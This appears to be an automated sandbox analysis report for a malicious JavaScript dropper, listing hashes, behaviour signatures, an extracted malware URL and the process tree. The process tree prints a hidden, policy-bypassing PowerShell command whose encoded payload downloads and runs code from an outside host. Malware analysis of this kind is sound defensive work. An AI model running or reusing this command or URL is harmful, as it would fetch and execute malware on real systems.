Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    31-08-2021 20:17

General

  • Target

    5613.js

  • Size

    137KB

  • MD5

    220af76150e7b8e51b12c322002d36db

  • SHA1

    b5befee69c32ecaa162808192f3c0f42cde731cd

  • SHA256

    924b39a646b7ba75fff348033897597b52f1a81af1830beeb279dca1556bd39b

  • SHA512

    d540686c0415d11be1bd65e1f55313ee0e0a7bd543eda231188daee9a39aa5c2471b19e730b74a397d5d5826e7c9ee21e86f2168b696c7ff8e5a8b7a261b2328

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\5613.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1544
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1528-61-0x0000000000000000-mapping.dmp

  • memory/1528-62-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp

    Filesize

    8KB

  • memory/1528-63-0x0000000002460000-0x0000000002461000-memory.dmp

    Filesize

    4KB

  • memory/1528-64-0x000000001AA70000-0x000000001AA71000-memory.dmp

    Filesize

    4KB

  • memory/1528-65-0x000000001A9F0000-0x000000001A9F2000-memory.dmp

    Filesize

    8KB

  • memory/1528-66-0x000000001A9F4000-0x000000001A9F6000-memory.dmp

    Filesize

    8KB

  • memory/1528-67-0x0000000002530000-0x0000000002531000-memory.dmp

    Filesize

    4KB

  • memory/1528-68-0x0000000002560000-0x0000000002561000-memory.dmp

    Filesize

    4KB

  • memory/1528-69-0x000000001C310000-0x000000001C311000-memory.dmp

    Filesize

    4KB

  • memory/1544-60-0x0000000000000000-mapping.dmp